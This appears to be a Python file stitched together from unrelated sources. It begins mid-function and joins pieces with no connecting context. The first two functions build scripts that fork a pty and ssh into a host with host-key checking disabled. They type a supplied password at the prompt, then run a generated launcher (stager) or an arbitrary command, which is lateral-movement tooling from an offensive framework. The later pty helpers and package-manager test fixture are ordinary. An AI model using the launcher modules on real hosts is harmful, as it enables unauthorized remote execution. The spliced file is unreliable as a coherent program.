    # placed inside a quoted string in the template below.
    launcher = launcher.replace("'", "\\'")
    launcher = launcher.replace('"', '\\"')
    if launcher == "":
        print helpers.color("[!] Error in launcher command generation.")
        return ""

    # NOTE(review): login and password are substituted without any
    # escaping -- confirm whether values containing quotes must work.
    script = """
import os
import pty

def wall(host, pw):
    import os,pty
    pid, fd = pty.fork()
    if pid == 0:
        os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
        os._exit(1)

    os.read(fd, 1024)
    os.write(fd, '\\n' + pw + '\\n')

    result = []
    while True:
        try:
            data = os.read(fd, 1024)
            if data == "Password:":
                os.write(fd, pw + '\\n')
        except OSError:
            break
        if not data:
            break
        result.append(data)
    pid, status = os.waitpid(pid, 0)
    return status, ''.join(result)

status, output = wall('%s','%s')
print status
print output

""" % (launcher, login, password)
    return script
def generate(self):
    """Return the source text of the script built from this module's options.

    Reads the Login, Password and Command options and substitutes them
    into the script template.

    Returns:
        The script source as a string.
    """
    login = self.options['Login']['Value']
    password = self.options['Password']['Value']
    command = self.options['Command']['Value']

    # generate the launcher code
    # NOTE(review): command, login and password are substituted without
    # any escaping -- confirm whether values containing quotes must work.
    script = """
import os
import pty

def wall(host, pw):
    import os,pty
    pid, fd = pty.fork()
    if pid == 0: # Child
        os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
        os._exit(1) # fail to execv

    # read '..... password:', write password
    os.read(fd, 1024)
    os.write(fd, '\\n' + pw + '\\n')

    result = []
    while True:
        try:
            data = os.read(fd, 1024)
            if data == "Password:":
                os.write(fd, pw + '\\n')
        except OSError:
            break
        if not data:
            break
        result.append(data)
    pid, status = os.waitpid(pid, 0)
    return status, ''.join(result)

status, output = wall('%s','%s')
print status
print output

""" % (command, login, password)
    return script
def open(self, command, env=None):
    """Create subprocess using forkpty().

    Args:
        command: Shell-style command line; split with ``shlex.split``.
        env: Optional mapping of extra environment variables to set in
            the child before exec.

    Returns:
        ``False`` when the pty fork fails.  On success the parent gets
        ``None`` and finds the child's pid and the pty master in
        ``self.pid`` / ``self.fd``; the child never returns.
    """
    # parse command
    command_arr = shlex.split(command)
    executable = command_arr[0]

    # try to fork a new pty
    try:
        self.pid, self.fd = pty.fork()
    except OSError:
        return False

    # child proc, replace with command after altering terminal attributes
    if self.pid == 0:
        try:
            # set requested environment variables
            if env:
                os.environ.update(env)

            # set tty attributes (best effort)
            try:
                attrs = tty.tcgetattr(1)
                # Clear IGNBRK with a mask; XOR would switch the flag ON
                # whenever it was not already set.
                attrs[0] = attrs[0] & ~tty.IGNBRK
                attrs[0] = attrs[0] | tty.BRKINT | tty.IXANY | tty.IMAXBEL
                attrs[2] = attrs[2] | tty.HUPCL
                attrs[3] = attrs[3] | tty.ICANON | tty.ECHO | tty.ISIG | tty.ECHOKE
                attrs[6][tty.VMIN] = 1
                attrs[6][tty.VTIME] = 0
                tty.tcsetattr(1, tty.TCSANOW, attrs)
            except Exception:
                pass

            # replace this process with the subprocess
            os.execvp(executable, command_arr)
        finally:
            # Only reached when exec failed; never let the child continue
            # into the caller's code.
            os._exit(127)
    # else master, do nothing
def ptyPopen(args, executable=None, env=None, shell=False):
    """Less featureful but inspired by subprocess.Popen.
    Runs subprocess in a pty.

    Args:
        args: Program and arguments, as a sequence or a single string.
        executable: Optional program to run; it also replaces ``args[0]``.
        env: Optional environment mapping for the child; ``None`` inherits
            the current environment.
        shell: When true, run ``args`` through ``/bin/sh -c``.

    Returns:
        ``(retcode, output)``: ``retcode`` is the child's exit status, or
        the negated signal number if a signal killed it; ``output`` is
        everything the child wrote to the pty, as bytes.
    """
    #
    # Note: In theory the right answer here is to subclass Popen,
    # but we found that in practice we'd have to reimplement most
    # of that class, because its handling of file descriptors is
    # too brittle in its _execute_child() code.
    #
    import errno

    def _drain(master_fd, outlist):
        # Use a list as a way to pass by reference.  Read until a real
        # EOF: an empty read, or EIO, which Linux reports once the slave
        # side of the pty is closed.  A short read is NOT end-of-file.
        while True:
            try:
                termdata = os.read(master_fd, 1024)
            except OSError as e:
                if e.errno == errno.EIO:
                    break
                raise
            if not termdata:
                break
            outlist.append(termdata)

    # Text types accepted as a single command string (Python 2 and 3).
    try:
        string_types = (basestring,)
    except NameError:
        string_types = (str,)

    # This is the arg handling protocol from Popen
    if isinstance(args, string_types):
        args = [args]
    else:
        args = list(args)

    if shell:
        args = ["/bin/sh", "-c"] + args
        if executable:
            args[0] = executable

    if executable is None:
        executable = args[0]

    pid, fd = pty.fork()
    if pid == 0:
        try:
            # Child
            if env is None:
                os.execvp(executable, args)
            else:
                os.execvpe(executable, args, env)
        except:
            traceback.print_exc()
            os._exit(99)

    # Parent: collect output on a helper thread while waiting.
    outlist = []
    t = threading.Thread(target=_drain, args=(fd, outlist))
    t.start()
    try:
        waitedpid, status = os.waitpid(pid, 0)
        t.join()
    finally:
        os.close(fd)

    if os.WIFSIGNALED(status):
        # Shifting the raw status would report 0 (success) here.
        retcode = -os.WTERMSIG(status)
    else:
        retcode = os.WEXITSTATUS(status)
    return retcode, b"".join(outlist)
def fakeroot_create():
    """Create a throw-away image holding a private copy of the pkg command.

    Returns ``(fakeroot, fakeroot_cmdpath)``: the image directory and the
    path of the pkg command copied into it.  Raises RuntimeError when the
    command already exists at that location.
    """
    test_root = os.path.join(g_tempdir, "ips.test.{0:d}".format(os.getpid()))
    fakeroot = os.path.join(test_root, "fakeroot")
    cmd_path = os.path.join(fakeroot, "pkg")

    try:
        os.stat(cmd_path)
        already_present = True
    except OSError:
        already_present = False
    if already_present:
        # fakeroot already exists
        raise RuntimeError("The fakeroot shouldn't already exist.\n"
            "Path is:{0}".format(cmd_path))

    # when creating the fakeroot we want to make sure pkg doesn't
    # touch the real root.
    env_sanitize(cmd_path)

    #
    # When accessing images via the pkg apis those apis will try
    # to access the image containing the command from which the
    # apis were invoked.  Normally when running the test suite the
    # command is run.py in a developers workspace, and that
    # workspace lives in the root image.  But accessing the root
    # image during a test suite run is verboten.  Hence, here we
    # create a temporary image from which we can run the pkg
    # command.
    #

    # create directories
    for directory in (test_root, fakeroot):
        mkdir_eexist_ok(directory)

    debug("fakeroot image create {0}".format(fakeroot))
    tracker = pkg.client.progress.NullProgressTracker()
    api_inst = pkg.client.api.image_create(PKG_CLIENT_NAME,
        CLIENT_API_VERSION, fakeroot,
        pkg.client.api.IMG_TYPE_ENTIRE, False,
        progtrack=tracker, cmdpath=cmd_path)

    #
    # put a copy of the pkg command in our fake root directory.
    # we do this because when recursive linked image commands are
    # run, the pkg interfaces may fork and exec additional copies
    # of pkg(1), and in this case we want them to run the copy of
    # pkg from the fake root.
    #
    pkg_source = os.path.join(g_pkg_path, "usr", "bin", "pkg")
    fakeroot_cmdpath = os.path.join(fakeroot, "pkg")
    shutil.copy(pkg_source, fakeroot_cmdpath)

    return fakeroot, fakeroot_cmdpath